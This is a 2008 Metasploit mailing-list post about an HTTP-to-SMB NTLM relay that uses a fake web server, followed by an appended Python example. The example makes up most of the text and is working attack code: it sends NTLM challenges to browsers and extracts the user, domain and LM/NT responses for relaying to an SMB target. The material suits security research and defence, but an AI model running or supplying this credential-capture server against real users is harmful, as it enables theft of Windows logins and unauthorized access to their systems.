-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

H D Moore wrote:
> On Monday 22 December 2008, ArcSighter Elite wrote:
>> Excuse me for the one-person chat in here.
>> But let me say that smb_relay of metasploit effectively fails after the
>> patch. We already know that; the curious thing is my Python script
>> doesn't.
>
> What is the difference? NTLMSSP instead of NTLMv2?
>
> -HD
>
> _______________________________________________
> Framework-Hackers mailing list
> Framework-Hackers@spool.metasploit.com
> http://spool.metasploit.com/mailman/listinfo/framework-hackers
>
I don't know yet what the true difference is here. But the fact is that what I've posted successfully works against XP SP(2|3) Spanish. We of course need more testing, but I already know some people qualify what smb_relay does as an SMB-to-SMB attack, and what I'm doing here is some sort of HTTP-to-SMB attack, in which the NTLM negotiation is requested by the (fake) web server with 401 + WWW-Authenticate: NTLM. Then the client sends me his authorization field in the NTLM Authorization header. It's a bit browser-based. Of course after that we get SMB traffic, but who cares?

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJT/tPH+KgkfcIQ8cRAg7zAKDfFdim60dM34k+gDyxjzRT3G41AwCfVsm1
rRfaYBZ6BzOW8ahSg6TGmgk=
=CsHi
-----END PGP SIGNATURE-----
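The HTTP side of the exchange described above, as an added example (Python, not the author's script and not Metasploit code): the fake web server answers the first request with 401 + WWW-Authenticate: NTLM, turns the browser's Type 1 (NEGOTIATE) into a 401 carrying a Type 2 (CHALLENGE), and pulls domain, user, workstation and the LM/NT responses out of the Type 3 (AUTHENTICATE) that arrives in the Authorization header. Message layouts follow the NTLMSSP wire format (NTLMSSP\0 signature, little-endian message type, Len/MaxLen/Offset security buffers). Assumptions: in the relay case the 8-byte server challenge handed to the browser is the one the real SMB target returned for the forwarded Type 1, which this example does not open a socket for; the challenge, names and response bytes below are constructed sample values; non-Unicode (OEM) strings are decoded as latin-1, an approximation.

```python
"""HTTP side of an NTLM-over-HTTP exchange: challenge, then parse the Type 3.
Added example; the byte layouts follow the NTLMSSP wire format."""
import base64
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE, CHALLENGE, AUTHENTICATE = 1, 2, 3
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_REQUEST_TARGET = 0x00000004
NTLMSSP_NEGOTIATE_NTLM = 0x00000200
DEFAULT_FLAGS = NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_REQUEST_TARGET | NTLMSSP_NEGOTIATE_NTLM


def _field(buf, off):
    """Read a Len(2)/MaxLen(2)/Offset(4) security buffer at off; return the bytes it points to."""
    length, _maxlen, offset = struct.unpack_from("<HHI", buf, off)
    return buf[offset:offset + length]


def to_header(msg):
    """Encode an NTLMSSP message the way it travels in Authorization / WWW-Authenticate."""
    return "NTLM " + base64.b64encode(msg).decode("ascii")


def build_type1(flags=DEFAULT_FLAGS):
    """NEGOTIATE_MESSAGE with empty DomainName/Workstation fields (fixed part is 32 bytes)."""
    return (NTLMSSP_SIGNATURE + struct.pack("<I", NEGOTIATE) + struct.pack("<I", flags)
            + struct.pack("<HHI", 0, 0, 32) + struct.pack("<HHI", 0, 0, 32))


def build_type2(server_challenge, target="WORKGROUP", flags=DEFAULT_FLAGS):
    """CHALLENGE_MESSAGE around an 8-byte challenge; fixed part is 48 bytes, TargetName follows."""
    if len(server_challenge) != 8:
        raise ValueError("server challenge must be 8 bytes")
    target_b = target.encode("utf-16-le")
    return (NTLMSSP_SIGNATURE + struct.pack("<I", CHALLENGE)
            + struct.pack("<HHI", len(target_b), len(target_b), 48)   # TargetNameFields
            + struct.pack("<I", flags) + server_challenge + b"\x00" * 8  # flags, challenge, reserved
            + struct.pack("<HHI", 0, 0, 48 + len(target_b))             # empty TargetInfoFields
            + target_b)


def build_type3(domain, user, workstation, lm_response, nt_response, flags=DEFAULT_FLAGS):
    """AUTHENTICATE_MESSAGE: six security buffers + flags = 64-byte fixed part, payload after it."""
    parts = [lm_response, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]  # last: session key
    fields, payload, off = b"", b"", 64
    for p in parts:
        fields += struct.pack("<HHI", len(p), len(p), off)
        payload += p
        off += len(p)
    return NTLMSSP_SIGNATURE + struct.pack("<I", AUTHENTICATE) + fields + struct.pack("<I", flags) + payload


def parse_ntlm_authorization(header_value):
    """Parse 'NTLM <base64>' from Authorization (or WWW-Authenticate) into a dict.
    Returns None when the header does not carry the NTLM scheme."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.upper() != "NTLM" or not token:
        return None
    msg = base64.b64decode(token)
    if len(msg) < 12 or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    mtype = struct.unpack_from("<I", msg, 8)[0]
    if mtype == NEGOTIATE:
        return {"type": NEGOTIATE, "flags": struct.unpack_from("<I", msg, 12)[0], "raw": msg}
    if mtype == CHALLENGE:
        return {"type": CHALLENGE, "flags": struct.unpack_from("<I", msg, 20)[0],
                "server_challenge": msg[24:32], "target": _field(msg, 12).decode("utf-16-le"), "raw": msg}
    if mtype == AUTHENTICATE:
        flags = struct.unpack_from("<I", msg, 60)[0]
        enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"  # OEM approximated
        return {"type": AUTHENTICATE, "flags": flags,
                "lm_response": _field(msg, 12), "nt_response": _field(msg, 20),
                "domain": _field(msg, 28).decode(enc), "user": _field(msg, 36).decode(enc),
                "workstation": _field(msg, 44).decode(enc), "raw": msg}
    return {"type": mtype, "raw": msg}


def handle_request(authorization, server_challenge):
    """One step of the fake server's state machine: (status, headers, parsed_message).
    server_challenge is assumed to come from the real SMB target in the relay case."""
    parsed = parse_ntlm_authorization(authorization) if authorization else None
    if parsed is None:
        return 401, {"WWW-Authenticate": "NTLM"}, None          # ask the browser for NTLM
    if parsed["type"] == NEGOTIATE:
        return 401, {"WWW-Authenticate": to_header(build_type2(server_challenge))}, parsed
    if parsed["type"] == AUTHENTICATE:
        return 200, {}, parsed  # the part worth relaying: user, domain, LM/NT responses
    return 400, {}, parsed


if __name__ == "__main__":
    chal = b"\x01" * 8  # constructed; would be the SMB target's challenge in a relay
    print(handle_request(None, chal)[:2])
    print(handle_request(to_header(build_type1()), chal)[:2])
    t3 = build_type3("CORP", "alice", "WKS01", b"\x11" * 24, b"\x22" * 24)  # constructed
    print({k: v for k, v in handle_request(to_header(t3), chal)[2].items() if k != "raw"})
```

Running it stand-alone walks the three states: the bare 401, the 401 carrying the Type 2 built around the supplied challenge, and the parsed Type 3 with the fields an SMB relay would forward; the NT/LM response bytes are only valid against whichever challenge the browser actually saw, which is why a relay must feed the target's challenge through rather than inventing one.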